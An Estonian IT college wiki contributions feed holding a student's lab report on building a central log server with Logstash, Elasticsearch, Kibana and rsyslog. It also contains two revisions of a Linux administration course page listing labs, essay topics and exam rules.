ICO wiki - User contributions [en]

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-12-05T11:24:14Z

Saus:

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS

Klient: Ubuntu client 64bit, versioon 13.04

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid

Elasticsearch versioon 0.90.0 - logide talletamiseks

Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks

''NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.''

= Protokoll =

== Serveri seadistamine ==
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

=== Logstash ===
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

Ja faili sisu:

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source lang="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

=== Elasticsearch ===
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

=== Kibana ===
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.

=== Rsyslog ===
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

<nowiki>*</nowiki>.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

= Kaitsmine =
syslogng, logstash ja rsyslog

Logstashi installeerimine on väga lihtne ja ainukeseks piiranguks (sõltuvuseks) on java olemasolu. Logstash on väga skaleeruv ja lihtsasti hallatav. Logstashi saab saata logisid erinevatest sisenditest - ei ole piiratud ainult syslogi-saatvate operatsioonisüsteemidega.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-12-05T10:25:28Z

Saus: /* Ülesande püstitus */

Linuxi administreerimine

2013-12-05T10:08:42Z

Saus: /* Esseede teemad 2013 */

=Üldinfo=
ECTS: 4
Hindamisviis: Eksam

==Õppejõud==
Margus Ernits

Katrin Loodus

=Eeldused ja sihtgrupp=

Operatsioonisüsteemide administreerimine ja sidumine (Rangelt soovituslik). Osadmin aines loetava oskamine on antud aine õppimise eelduseks. ÕISis on see eeldus märgitud soovituslikuks, kuna igal aastal on paar inimest, kes suudavad mõlemad ained korraga läbida ja on antud vallas väga pädevad.
Linuxi administraatori kursus on mõeldud tugeva infotehnoloogilise põhjaga arvuti-spetsialistile.
Kursuse rõhk on eelkõige võrguhalduril, kelle tööülesannete hulka kuulub igapäevane serverite, võrgu jms hooldus, konfigureerimine ja uute seadmete installatsioon.

=Eesmärk ja sisu=

Kursuse esimeses osas õpitakse tundma Linux süsteemi toimimist, antakse ülevaade administreerimistoimingute automatiseerimisest shelli skriptide abil ja omandatakse praktiline käsufailide koostamise kogemus.

Teises osas õpitakse paigaldama ja konfigureerima erinevaid võrguteenuseid. Kursuse teise osa alguses korratakse taseme ühtlustamiseks TCP/IP võrgu põhialuseid.

=Õpiväljundid=

=Loengud=

Kaugõppe loengute ja praktikumide videosalvestused:
http://echo360.e-ope.ee/ess/portal/section/4bd0abde-1b0d-4c92-a35e-0f99a81f069d

1. Sissejuhatav loeng eeldustest [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng01%20-%20Sissejuhatus%20ainesse%20Linux%20administreerimine%20-%202013%20.pdf Sissejuhatus Loeng 1]

2. Kordamine Osadmin [http://elab.itcollege.ee:8000/Linux-Basics.mm]

3. Linux süsteemi põhilised komponendid [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng02%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 2]

4. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng03%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 3]

5. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng04%20-%20Linux%20s%c3%bcsteemide%20haldamine%20II%20-%202013%20.pdf Linux haldamine Loeng 4]

Puppeti teise loengu video: http://elab.itcollege.ee:8000/linux-admin/pupppet-algus.ogv

=Praktikumid=

==Esimene praktikum - Ubuntu Serveri ja kliendi paigaldamine ning kordamine==
* Paigaldage '''Ubuntu Linux Server''' süsteem VirtualBox abil
**RAM 512MB
**HDD dynamicly allocated 8GB
**2 Võrgukaarti NIC1 - NAT (eth0 - Ubuntus) ja NIC2 - HostOnly (eth1 - Ubuntus)
**Logige serverisse sisse ja seadistage võrk failis /etc/network/interfaces (liidese eth1 ip aadress 192.168.56.200).
***Abiinfo [[Ubuntu server võrgu seadistamine]] ja [[VirtualBoxi võrgud]]

<source lang="bash">
auto eth1
iface eth1 inet static
address 192.168.56.200
netmask 255.255.255.0
</source>

*Paigaldage openssh server, kui te seda installi käigus ei teinud (apt-get update && apt-get install ssh)

Ubuntu Server 12.04.1 LTS ISO (64bit) http://elab.itcollege.ee:8000/ubuntu-12.04.1-server-amd64.iso

Eelduste kontrollimise test harjutamiseks: http://goo.gl/73xBZ
Kes tunneb, et test on '''liiga keeruline''', peab '''kaaluma''' aine deklareerimise asemel '''Osadmin aine (mis on soovituslik eeldus) läbimist'''.

* '''Ubuntu Desktop Linux''' paigaldamine (Võib paigaldada ka mõne muu disrtibutsiooni desktop masina, kuna seda läheb meil niikuinii hiljem vaja)
**Memory 1024MB
**HDD 16GB (või 8GB) Dynamic disk
**Network
**Video Memory 64MB 3D acceleration sisse

'''NB! Kasutamiseks valmis masinad: [http://elab.itcollege.ee:8000/ubuntu-server-64.ova server 64bit] ja [http://elab.itcollege.ee:8000/ubuntu-desktop-64.ova klient 64bit], [http://elab.itcollege.ee:8000/UbuntuServer32bit.ova server 32bit] ja [http://elab.itcollege.ee:8000/UbuntuDesktop32bit.ova klient 32bit]'''

Pärast paigaldamist seadistada [https://wiki.itcollege.ee/index.php/OpenSSH:_v%C3%B5tmetega_autentimine key based autentimisega] serverisse sisenemine. (tööjaamast saab serveris käske käivitada)

==Teine ja kolmas praktikum - Eeldustetest ja kordamine==

Kordamiseks leiate vajalikku infot [https://wiki.itcollege.ee/index.php/Category:Operatsioonis%C3%BCsteemide_administreerimine_ja_sidumine Operatsioonisüsteemide administreerimise ja sidumise] aine vikist.

[http://goo.gl/AFGfoV Eeldustetest 1]

[http://goo.gl/F0PiWK Eeldustetest 2]

==Linux keskhaldus puppet baasil==

Praktikumis paigaldame puppet serveri (master) ja kliendi.

Näiteülesanded kaitsmiseks

1. Loo puppet abil fail /etc/issue sisuga KALA

2. Loo puppet abil kasutaja polekala, kodukaustaga /home/polekala, shelliga /bin/zsh ( tee ka paki zsh paigaldus)

3. Lisa nodele class tarkvara, mis paigaldab htop, bpython pakid

4. Loo nodele class eemalda, mis eemaldab paki cowsay

5. Viimane ülesanne on igal ühel erinev.

5.1 Loo serverisse kasutaja kala ja tee talle ssh key. Seadista kliendiarvuti selliselt, et paigaldataks pakk ssh ja lisataks root kasutajale kliendis loodud ssh public key.

5.2 Paigalda kliendi arvutisse ntp server ja määra ntp serveriteks ntp.eenet.ee ja ntp.ut.ee

5.3 Lisa kliendi arvutisse apache2 veebiserver koos virtualhostiga www.planet.zz, (failis /var/www/www.planet.zz/index.html on rida www.planet.zz)
Apache konfis peab olema ServerName www.planet.zz ja sites-enabled all sait www.planet.zz

5.4 Lisa kliendi arvutisse bind9 nimeserver (normaalselt tööjaama seda ei tehta, kuid antud näitel on meil vaid üks konfigureeritav host). Seadista enda valitud domeeniminega tsoon koos revers tsooniga. Lisa kirjed www.sinudomeen.zz, mail.sinudomeen.zz, puppet.sinudomeen.zz koos PTR kirjetega.

[[Puppet Examples]]

==Keskne logiserver==
Labor 2 üheks võimalikuks teemaks on keskse logihalduse lahenduse loomine

[[Keskse logilahenduse rakendamine]]

[http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf Lõputöö logihalduse teemal]

http://rdstash.blogspot.com/2013/01/installing-logstash-as-syslog-server-on.html

=Esseede teemad 2012=

Võib valida keerulisemaid teemasid ka [[Osadmin referaadi teemad]] lehelt.

[[zsh]] - pole algajale

Mida uurida

Prompt

http://zshwiki.org/home/config/prompt

http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/

.zshrc

for

if

while

jne

[[exFAT vs Linux]] - Kalju Hõbemäe

[[CentOS Server]] --- teeb Oliver Naaris

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Superb Mini Server]] --- Mark-Erik Mogom, Andrus Dei

Paigaldamine

DNS, samba, LDAP, e-post seadistamine

[[Oracle Linux]]

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Suse Linux]]

Paigaldamine

Teenuste DNS, apache2, samba seadistamine

[[OpenLDAP Ubuntu Serveril]] - Tarmo Suurmägi, Taavi Sannik, Harri Uljas

[[Zentyal SAMBA4]] --- Lang & Lihten A31

Samba4 domeenikontrolleri seadistamine ja ubuntu/fedora/muu süsteem autentimise seadistamine kasutades uusi vahendeid

[[Apt-yum/dpkg-rpm käskude lühivõrdlus]] - Teet Saar A32

[[Ophcrack]] - teeb Kristo Kapten

[[rancid]] - Meelis Kurnikov, Aive Haavel AK31

[[zenoss]] - Kristjan Vaik

[[Apache autentimine LDAP'iga]] - Rauno Lehiste
=Esseede teemad 2013=
[[Owncloud]] - Tõnu Erm AK31

[[Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll]] - Sten Aus 28.11.2013

=Eksamist=

Tee ära labor 2 (oma valitud teemal + selle kohta wiki kirjatöö)
Eksamil ole valmis demoma labor 1 raames kaitstud asju.

Kirjatööd sisu tuleb eksamil kaitsta vestluse vormis.

Eksami käigus saab kaitsta ka labor 1 ja 2 asju.

Eksami käigus tõmbad loosi, mida labor 1 raames parandada. Õppejõud teeb teenuse katki ja tudeng teeb korda. (soovitatav on eelnevalt teha teenusest varukoopia).

Punkte saab selgituse eest, mis oli katki ja kuidas tegid korda.

Katki tegemisel võib arvestada näiteks, et algaja admin (õppejõud:) muutis ära parooli, rikkus võrguseaded ja kustutas täiesti süüdimatult mõne konfifaili.

=Laborimaterjalid 2012=

Teha apt - yum ja dpkg - rpm vastavustabel. dpkg ja apt korraldused leiab [http://elab.itcollege.ee:8000/Linux-Basics.mm Linux-Basics mindmapist]

Parim töö annab 7p, järgmised 5p (piisavalt põhjalikud ja erinevad)

Ebapiisavad vastavustabelid, mis sarnanevad üksteisele punkte ei saa.

Kui su tabel on ilma vigadeta, kuid mitte parimate sead siis saad 1-2p.

'''Praks 4'''

Nimeserveri BIND9 paigaldamine.

*Mõtle välja domeenimini
*Paigalda nimeserver bind9
*Seadista oma domeen
**www.domeen
**ns.domeen
**sales.domeen
**seadista oma kliendimasin kasutama uut nimeserverit

NB: enne kaitsmist lugeda läbi http://kuutorvaja.eenet.ee/wiki/DNS

Labori üks näide [[Nimeserveri seadistamine BIND9 näitel]]

Praktikumi salvestus http://echo360.e-uni.ee/ess/echo/presentation/a828b6af-8caf-4319-b594-5d6bfed04a70

'''Punktide''' (5p) '''kirja saamiseks''' peab töötama nii nimede lahendamine läbi teie nimeserveri kui ka reverse lookup.

'''Praks 5'''

Veebiserveri apache2 paigaldamine

*Loo veebisaidid www.domeen ja sales.domeen (ehk oma DNS labori nimedele vastavad veebisaidid)
Praktikumi salvestus: http://echo360.e-uni.ee/ess/echo/presentation/0945a764-0305-48ec-8082-4e57a23cc536
*Seadist HTTPS nendele saitidele (vajadusel loo uus ip alias ja muuda nimeserveris olevat kirjet, et TLS nimed viitaks erinevatele IP aadressidele)
*Abiks on loeng: http://enos.itcollege.ee/~mernits/infrastruktuur/loeng04%20-%20Veebiserver.odp ja labor: https://wiki.itcollege.ee/index.php/Veebiserveri_labor_v.2
*Paigalda WordPress vastavalt juhendile: http://goo.gl/6XQ0U

'''Punktide''' (5p) '''kirja saamiseks''' peab töötama veebiserververi apache2 pealt 2 veebilehte ning wordpress. Wordpressile peab olema paigaldatud super cache ning lisaks peab töötama varnish. Seejuures wordpress on seadistatud pordile 80 ja wordpress pordil 8080. Lehe toimivust testige enne kaitsmist ab vahendiga, kus -n 1000 ja -t 10.

'''Praks 7'''
Samba share-i välja jagamine.

*Loo share, mis on ligipääsetav vaid kasutajatele, kes kuuluvad lab gruppi. Vajalik on ka share-ile kirjutamisõigus (saab kausta luua).
* Seadista samba abil kasutajate kodukaustadele ligipääsemine. Iga kasutaja peab ligi pääsema enda kodukaustale.

*Abiks on viki artiklid : https://wiki.itcollege.ee/index.php/Failiserver_Samba_labor_2 ja https://wiki.itcollege.ee/index.php/Lihtne_samba_install

'''Punktide''' (5p) '''kirja saamiseks''' on vajalik share-i olemasolu, mis on ligipääsetav ning kirjutatav (võimalik luua kataloogi) ainult lab gruppi kuuluvatele kasutajatele ning lab gruppi mitte kuuluvad kasutajad ei tohi sinna ligi pääseda.
Lisaks peavad kasutajad pääsema ligi oma kodukaustale, sõltumata sellest, kas ta kuulub lab gruppi või mitte.

'''Labor 1'''
*Veebiserver ja virtualhostid
*DNS
*e-post
*iptables
*samba

'''Labor 2'''
*LDAP või Samba4 - LDAP Teet Saar, Kullo-Kalev Aru
*Puppet või chef
*PAM
*Puppet (Ubuntus) - Kristo Kapten
*[[Samba(windows domeenis fileserver)]] - Marko Kurs
*[[TLS termineerimine nginx abil]] - Sander Arnus, Sander Saveli

Linuxi administreerimine

2013-12-05T10:08:32Z

Saus:

=Üldinfo=
ECTS: 4
Hindamisviis: Eksam

==Õppejõud==
Margus Ernits

Katrin Loodus

=Eeldused ja sihtgrupp=

Operatsioonisüsteemide administreerimine ja sidumine (Rangelt soovituslik). Osadmin aines loetava oskamine on antud aine õppimise eelduseks. ÕISis on see eeldus märgitud soovituslikuks, kuna igal aastal on paar inimest, kes suudavad mõlemad ained korraga läbida ja on antud vallas väga pädevad.
Linuxi administraatori kursus on mõeldud tugeva infotehnoloogilise põhjaga arvuti-spetsialistile.
Kursuse rõhk on eelkõige võrguhalduril, kelle tööülesannete hulka kuulub igapäevane serverite, võrgu jms hooldus, konfigureerimine ja uute seadmete installatsioon.

=Eesmärk ja sisu=

Kursuse esimeses osas õpitakse tundma Linux süsteemi toimimist, antakse ülevaade administreerimistoimingute automatiseerimisest shelli skriptide abil ja omandatakse praktiline käsufailide koostamise kogemus.

Teises osas õpitakse paigaldama ja konfigureerima erinevaid võrguteenuseid. Kursuse teise osa alguses korratakse taseme ühtlustamiseks TCP/IP võrgu põhialuseid.

=Õpiväljundid=

=Loengud=

Kaugõppe loengute ja praktikumide videosalvestused:
http://echo360.e-ope.ee/ess/portal/section/4bd0abde-1b0d-4c92-a35e-0f99a81f069d

1. Sissejuhatav loeng eeldustest [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng01%20-%20Sissejuhatus%20ainesse%20Linux%20administreerimine%20-%202013%20.pdf Sissejuhatus Loeng 1]

2. Kordamine Osadmin [http://elab.itcollege.ee:8000/Linux-Basics.mm]

3. Linux süsteemi põhilised komponendid [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng02%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 2]

4. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng03%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 3]

5. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng04%20-%20Linux%20s%c3%bcsteemide%20haldamine%20II%20-%202013%20.pdf Linux haldamine Loeng 4]

Puppeti teise loengu video: http://elab.itcollege.ee:8000/linux-admin/pupppet-algus.ogv

=Praktikumid=

==Esimene praktikum - Ubuntu Serveri ja kliendi paigaldamine ning kordamine==
* Paigaldage '''Ubuntu Linux Server''' süsteem VirtualBox abil
**RAM 512MB
**HDD dynamicly allocated 8GB
**2 Võrgukaarti NIC1 - NAT (eth0 - Ubuntus) ja NIC2 - HostOnly (eth1 - Ubuntus)
**Logige serverisse sisse ja seadistage võrk failis /etc/network/interfaces (liidese eth1 ip aadress 192.168.56.200).
***Abiinfo [[Ubuntu server võrgu seadistamine]] ja [[VirtualBoxi võrgud]]

<source lang="bash">
auto eth1
iface eth1 inet static
address 192.168.56.200
netmask 255.255.255.0
</source>

*Paigaldage openssh server, kui te seda installi käigus ei teinud (apt-get update && apt-get install ssh)

Ubuntu Server 12.04.1 LTS ISO (64bit) http://elab.itcollege.ee:8000/ubuntu-12.04.1-server-amd64.iso

Eelduste kontrollimise test harjutamiseks: http://goo.gl/73xBZ
Kes tunneb, et test on '''liiga keeruline''', peab '''kaaluma''' aine deklareerimise asemel '''Osadmin aine (mis on soovituslik eeldus) läbimist'''.

* '''Ubuntu Desktop Linux''' paigaldamine (Võib paigaldada ka mõne muu disrtibutsiooni desktop masina, kuna seda läheb meil niikuinii hiljem vaja)
**Memory 1024MB
**HDD 16GB (või 8GB) Dynamic disk
**Network
**Video Memory 64MB 3D acceleration sisse

'''NB! Kasutamiseks valmis masinad: [http://elab.itcollege.ee:8000/ubuntu-server-64.ova server 64bit] ja [http://elab.itcollege.ee:8000/ubuntu-desktop-64.ova klient 64bit], [http://elab.itcollege.ee:8000/UbuntuServer32bit.ova server 32bit] ja [http://elab.itcollege.ee:8000/UbuntuDesktop32bit.ova klient 32bit]'''

Pärast paigaldamist seadistada [https://wiki.itcollege.ee/index.php/OpenSSH:_v%C3%B5tmetega_autentimine key based autentimisega] serverisse sisenemine. (tööjaamast saab serveris käske käivitada)

==Teine ja kolmas praktikum - Eeldustetest ja kordamine==

Kordamiseks leiate vajalikku infot [https://wiki.itcollege.ee/index.php/Category:Operatsioonis%C3%BCsteemide_administreerimine_ja_sidumine Operatsioonisüsteemide administreerimise ja sidumise] aine vikist.

[http://goo.gl/AFGfoV Eeldustetest 1]

[http://goo.gl/F0PiWK Eeldustetest 2]

==Linux keskhaldus puppet baasil==

Praktikumis paigaldame puppet serveri (master) ja kliendi.

Näiteülesanded kaitsmiseks

1. Loo puppet abil fail /etc/issue sisuga KALA

2. Loo puppet abil kasutaja polekala, kodukaustaga /home/polekala, shelliga /bin/zsh ( tee ka paki zsh paigaldus)

3. Lisa nodele class tarkvara, mis paigaldab htop, bpython pakid

4. Loo nodele class eemalda, mis eemaldab paki cowsay

5. Viimane ülesanne on igal ühel erinev.

5.1 Loo serverisse kasutaja kala ja tee talle ssh key. Seadista kliendiarvuti selliselt, et paigaldataks pakk ssh ja lisataks root kasutajale kliendis loodud ssh public key.

5.2 Paigalda kliendi arvutisse ntp server ja määra ntp serveriteks ntp.eenet.ee ja ntp.ut.ee

5.3 Lisa kliendi arvutisse apache2 veebiserver koos virtualhostiga www.planet.zz, (failis /var/www/www.planet.zz/index.html on rida www.planet.zz)
Apache konfis peab olema ServerName www.planet.zz ja sites-enabled all sait www.planet.zz

5.4 Lisa kliendi arvutisse bind9 nimeserver (normaalselt tööjaama seda ei tehta, kuid antud näitel on meil vaid üks konfigureeritav host). Seadista enda valitud domeeniminega tsoon koos revers tsooniga. Lisa kirjed www.sinudomeen.zz, mail.sinudomeen.zz, puppet.sinudomeen.zz koos PTR kirjetega.

[[Puppet Examples]]

==Keskne logiserver==
Labor 2 üheks võimalikuks teemaks on keskse logihalduse lahenduse loomine

[[Keskse logilahenduse rakendamine]]

[http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf Lõputöö logihalduse teemal]

http://rdstash.blogspot.com/2013/01/installing-logstash-as-syslog-server-on.html

=Esseede teemad 2012=

Võib valida keerulisemaid teemasid ka [[Osadmin referaadi teemad]] lehelt.

[[zsh]] - pole algajale

Mida uurida

Prompt

http://zshwiki.org/home/config/prompt

http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/

.zshrc

for

if

while

jne

[[exFAT vs Linux]] - Kalju Hõbemäe

[[CentOS Server]] --- teeb Oliver Naaris

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Superb Mini Server]] --- Mark-Erik Mogom, Andrus Dei

Paigaldamine

DNS, samba, LDAP, e-post seadistamine

[[Oracle Linux]]

Paigaldamine

Teenuste DNS, apache2, samba, e-post seadistamine

[[Suse Linux]]

Paigaldamine

Teenuste DNS, apache2, samba seadistamine

[[OpenLDAP Ubuntu Serveril]] - Tarmo Suurmägi, Taavi Sannik, Harri Uljas

[[Zentyal SAMBA4]] --- Lang & Lihten A31

Samba4 domeenikontrolleri seadistamine ja ubuntu/fedora/muu süsteem autentimise seadistamine kasutades uusi vahendeid

[[Apt-yum/dpkg-rpm käskude lühivõrdlus]] - Teet Saar A32

[[Ophcrack]] - teeb Kristo Kapten

[[rancid]] - Meelis Kurnikov, Aive Haavel AK31

[[zenoss]] - Kristjan Vaik

[[Apache autentimine LDAP'iga]] - Rauno Lehiste
=Esseede teemad 2013=
[[Owncloud]] - Tõnu Erm AK31
[[Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll]] - Sten Aus 28.11.2013

=Eksamist=

Tee ära labor 2 (oma valitud teemal + selle kohta wiki kirjatöö)
Eksamil ole valmis demoma labor 1 raames kaitstud asju.

Kirjatööd sisu tuleb eksamil kaitsta vestluse vormis.

Eksami käigus saab kaitsta ka labor 1 ja 2 asju.

Eksami käigus tõmbad loosi, mida labor 1 raames parandada. Õppejõud teeb teenuse katki ja tudeng teeb korda. (soovitatav on eelnevalt teha teenusest varukoopia).

Punkte saab selgituse eest, mis oli katki ja kuidas tegid korda.

Katki tegemisel võib arvestada näiteks, et algaja admin (õppejõud:) muutis ära parooli, rikkus võrguseaded ja kustutas täiesti süüdimatult mõne konfifaili.

=Laborimaterjalid 2012=

Teha apt - yum ja dpkg - rpm vastavustabel. dpkg ja apt korraldused leiab [http://elab.itcollege.ee:8000/Linux-Basics.mm Linux-Basics mindmapist]

Parim töö annab 7p, järgmised 5p (piisavalt põhjalikud ja erinevad)

Ebapiisavad vastavustabelid, mis sarnanevad üksteisele punkte ei saa.

Kui su tabel on ilma vigadeta, kuid mitte parimate sead siis saad 1-2p.

'''Praks 4'''

Nimeserveri BIND9 paigaldamine.

*Mõtle välja domeenimini
*Paigalda nimeserver bind9
*Seadista oma domeen
**www.domeen
**ns.domeen
**sales.domeen
**seadista oma kliendimasin kasutama uut nimeserverit

NB: enne kaitsmist lugeda läbi http://kuutorvaja.eenet.ee/wiki/DNS

Labori üks näide [[Nimeserveri seadistamine BIND9 näitel]]

Praktikumi salvestus http://echo360.e-uni.ee/ess/echo/presentation/a828b6af-8caf-4319-b594-5d6bfed04a70

'''Punktide''' (5p) '''kirja saamiseks''' peab töötama nii nimede lahendamine läbi teie nimeserveri kui ka reverse lookup.

'''Praks 5'''

Veebiserveri apache2 paigaldamine

*Loo veebisaidid www.domeen ja sales.domeen (ehk oma DNS labori nimedele vastavad veebisaidid)
Praktikumi salvestus: http://echo360.e-uni.ee/ess/echo/presentation/0945a764-0305-48ec-8082-4e57a23cc536
*Seadist HTTPS nendele saitidele (vajadusel loo uus ip alias ja muuda nimeserveris olevat kirjet, et TLS nimed viitaks erinevatele IP aadressidele)
*Abiks on loeng: http://enos.itcollege.ee/~mernits/infrastruktuur/loeng04%20-%20Veebiserver.odp ja labor: https://wiki.itcollege.ee/index.php/Veebiserveri_labor_v.2
*Paigalda WordPress vastavalt juhendile: http://goo.gl/6XQ0U

'''Punktide''' (5p) '''kirja saamiseks''' peab töötama veebiserververi apache2 pealt 2 veebilehte ning wordpress. Wordpressile peab olema paigaldatud super cache ning lisaks peab töötama varnish. Seejuures wordpress on seadistatud pordile 80 ja wordpress pordil 8080. Lehe toimivust testige enne kaitsmist ab vahendiga, kus -n 1000 ja -t 10.

'''Praks 7'''
Samba share-i välja jagamine.

*Loo share, mis on ligipääsetav vaid kasutajatele, kes kuuluvad lab gruppi. Vajalik on ka share-ile kirjutamisõigus (saab kausta luua).
* Seadista samba abil kasutajate kodukaustadele ligipääsemine. Iga kasutaja peab ligi pääsema enda kodukaustale.

*Abiks on viki artiklid : https://wiki.itcollege.ee/index.php/Failiserver_Samba_labor_2 ja https://wiki.itcollege.ee/index.php/Lihtne_samba_install

